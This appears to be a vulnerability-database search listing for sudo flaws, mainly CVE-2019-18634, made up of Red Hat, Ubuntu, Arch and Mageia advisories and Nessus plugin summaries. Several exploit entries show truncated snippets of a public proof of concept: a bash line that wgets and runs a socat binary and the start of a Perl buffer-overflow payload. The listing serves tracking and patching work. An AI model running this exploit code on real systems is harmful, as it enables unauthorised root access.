
4726 matches found

RedHat Linux
added 2020/02/14 12:26 p.m. | 67 views

Important: Red Hat Security Advisory: sudo security update

An update for sudo is now available for Red Hat Enterprise Linux 8. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the...

CVSS 7.8 | AI score 7.4 | EPSS 0.19426
Exploits: 13 | References: 2

RedHat Linux
added 2020/02/14 12:26 p.m. | 3 views

sudo: Stack based buffer overflow when pwfeedback is enabled

A flaw was found in the Sudo application when the 'pwfeedback' option is set to true in the sudoers file. An authenticated user can use this vulnerability to trigger a stack-based buffer overflow under certain conditions even without Sudo privileges. The buffer overflow may allow an attacker to...

CVSS 7.8 | AI score 7.6 | EPSS 0.19426
Exploits: 13 | References: 5

RedHat Linux
added 2020/02/14 12:25 p.m. | 87 views

Important: Red Hat Security Advisory: sudo security update

An update for sudo is now available for Red Hat Enterprise Linux 8.0 Update Services for SAP Solutions. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is...

CVSS 7.8 | AI score 7.4 | EPSS 0.19426
Exploits: 13 | References: 2

RedHat Linux
added 2020/02/14 12:25 p.m. | 2 views

sudo: Stack based buffer overflow when pwfeedback is enabled

A flaw was found in the Sudo application when the 'pwfeedback' option is set to true in the sudoers file. An authenticated user can use this vulnerability to trigger a stack-based buffer overflow under certain conditions even without Sudo privileges. The buffer overflow may allow an attacker to...

CVSS 7.8 | AI score 7.6 | EPSS 0.19426
Exploits: 13 | References: 5

Tenable Nessus
added 2020/02/14 12:00 a.m. | 25 views

RHEL 8 : sudo (RHSA-2020:0509)

The remote Redhat Enterprise Linux 8 host has a package installed that is affected by a vulnerability as referenced in the RHSA-2020:0509 advisory. The sudo packages contain the sudo utility which allows system administrators to provide certain users with the permission to execute privileged...

CVSS 7.8 | AI score 7.9 | EPSS 0.19426
Exploits: 13 | References: 4

Tenable Nessus
added 2020/02/14 12:00 a.m. | 31 views

RHEL 8 : sudo (RHSA-2020:0487)

The remote Redhat Enterprise Linux 8 host has a package installed that is affected by a vulnerability as referenced in the RHSA-2020:0487 advisory. The sudo packages contain the sudo utility which allows system administrators to provide certain users with the permission to execute privileged...

CVSS 7.8 | AI score 7.9 | EPSS 0.19426
Exploits: 13 | References: 4

GithubExploit
added 2020/02/13 11:57 a.m. | 43 views

Exploit for Out-of-bounds Write in Sudo_Project Sudo

PoC exploit for CVE-2019-18634, a vulnerability in the Sudo pack...

CVSS 7.8 | AI score 7.6 | EPSS 0.19426
Exploits: 13

Mageia
added 2020/02/09 7:13 p.m. | 42 views

Updated sudo packages fix security vulnerability

The updated packages fix a security vulnerability: In Sudo before 1.8.31, if pwfeedback is enabled in /etc/sudoers, users can trigger a stack-based buffer overflow in the privileged sudo process. pwfeedback is a default setting in Linux Mint and elementary OS; however, it is NOT the default for...

CVSS 7.8 | AI score 3.1 | EPSS 0.19426
Exploits: 13 | References: 4

OSV
added 2020/02/09 7:13 p.m. | 8 views

MGASA-2020-0081 Updated sudo packages fix security vulnerability

The updated packages fix a security vulnerability: In Sudo before 1.8.31, if pwfeedback is enabled in /etc/sudoers, users can trigger a stack-based buffer overflow in the privileged sudo process. pwfeedback is a default setting in Linux Mint and elementary OS; however, it is NOT the default for...

CVSS 7.8 | AI score 7.8 | EPSS 0.19426
Exploits: 13 | References: 5

GithubExploit
added 2020/02/07 2:41 a.m. | 139 views

Exploit for Out-of-bounds Write in Sudo_Project Sudo

CVE-2019-18634 :warning: This code has only been tested on...

CVSS 7.8 | AI score 8.2 | EPSS 0.19426
Exploits: 13

OSV
added 2020/02/06 5:15 p.m. | 1 view

CVE-2020-7954

An issue was discovered in OpServices OpMon 9.3.2. Starting from the apache user account, it is possible to perform privilege escalation through the lack of correct configuration in the server's sudoers file, which by default allows the execution of programs e.g. nmap without the need for a...

CVSS 7.8 | AI score 7.2 | EPSS 0.00384
Exploits: 0 | References: 2

Prion
added 2020/02/06 5:15 p.m. | 13 views

Design/Logic Flaw

An issue was discovered in OpServices OpMon 9.3.2. Starting from the apache user account, it is possible to perform privilege escalation through the lack of correct configuration in the server's sudoers file, which by default allows the execution of programs e.g. nmap without the need for a...

CVSS 7.2 | AI score 7.9 | EPSS 0.00384
Exploits: 0 | References: 2 | Affected Software: 1

exploitpack
added 2020/02/06 12:00 a.m. | 30 views

Sudo 1.8.25p - pwfeedback Buffer Overflow

Sudo 1.8.25p - pwfeedback Buffer Overflow !/bin/bash We will need socat to run this. if ! -f socat ; then wget https://raw.githubusercontent.com/andrew-d/static-binaries/master/binaries/linux/x8664/socat chmod +x socat fi cat xpl.pl $bufsz = 256; $askpasssz = 32; $signosz = 465; $tgetpassflag =...

AI score 1.3
Exploits: 0

Exploit DB
added 2020/02/06 12:00 a.m. | 218 views

Sudo 1.8.25p - 'pwfeedback' Buffer Overflow

!/bin/bash We will need socat to run this. if ! -f socat ; then wget https://raw.githubusercontent.com/andrew-d/static-binaries/master/binaries/linux/x8664/socat chmod +x socat fi cat xpl.pl $bufsz = 256; $askpasssz = 32; $signosz = 465; $tgetpassflag = "\x04\x00\x00\x00" . "\x00"x24;...

AI score 7.4
Exploits: 0

ArchLinux
added 2020/02/06 12:00 a.m. | 40 views

[ASA-202002-2] sudo: privilege escalation

Arch Linux Security Advisory ASA-202002-2
Severity: High
Date: 2020-02-06
CVE-ID: CVE-2019-18634
Package: sudo
Type: privilege escalation
Remote: No
Link: https://security.archlinux.org/AVG-1093
Summary: The package sudo before version 1.8.31...

CVSS 7.8 | AI score 1.4 | EPSS 0.19426
Exploits: 13 | References: 4

Ubuntu
added 2020/02/05 1:10 p.m. | 118 views

USN-4263-2: Sudo vulnerability

USN-4263-1 fixed a vulnerability in Sudo. This update provides the corresponding update for Ubuntu 12.04 ESM and Ubuntu 14.04 ESM. Original advisory details: Joe Vennix discovered that Sudo incorrectly handled memory operations when the pwfeedback option is enabled. A local attacker could possibl...

CVSS 7.8 | AI score 7.4 | EPSS 0.19426
Exploits: 13

OSV
added 2020/02/05 1:10 p.m. | 3 views

USN-4263-2 sudo vulnerability

USN-4263-1 fixed a vulnerability in Sudo. This update provides the corresponding update for Ubuntu 12.04 ESM and Ubuntu 14.04 ESM. Original advisory details: Joe Vennix discovered that Sudo incorrectly handled memory operations when the pwfeedback option is enabled. A local attacker could possibl...

CVSS 7.8 | AI score 7.1 | EPSS 0.19426
Exploits: 13 | References: 2

0day.today
added 2020/02/05 12:00 a.m. | 162 views

Sudo 1.8.25p - (pwfeedback) Buffer Overflow Exploit

!/bin/bash We will need socat to run this. if ! -f socat ; then wget https://raw.githubusercontent.com/andrew-d/static-binaries/master/binaries/linux/x8664/socat chmod +x socat fi cat xpl.pl $bufsz = 256; $askpasssz = 32; $signosz = 465; $tgetpassflag = "\x04\x00\x00\x00" . "\x00"x24;...

CVSS 7.8 | AI score 0.6 | EPSS 0.19426
Exploits: 13

Tenable Nessus
added 2020/02/05 12:00 a.m. | 39 views

RHEL 8 : sudo (RHSA-2020:0388)

The remote Redhat Enterprise Linux 8 host has a package installed that is affected by a vulnerability as referenced in the RHSA-2020:0388 advisory. The sudo packages contain the sudo utility which allows system administrators to provide certain users with the permission to execute privileged...

CVSS 9 | AI score 7.6 | EPSS 0.63917
Exploits: 10 | References: 4

RedHat Linux
added 2020/02/04 12:56 p.m. | 3 views

sudo: Privilege escalation via 'Runas' specification with 'ALL' keyword

A flaw was found in the way sudo implemented running commands with arbitrary user ID. If a sudoers entry is written to allow the attacker to run a command as any user except root, this flaw can be used by the attacker to bypass that restriction...

CVSS 9 | AI score 7.3 | EPSS 0.63917
Exploits: 10 | References: 5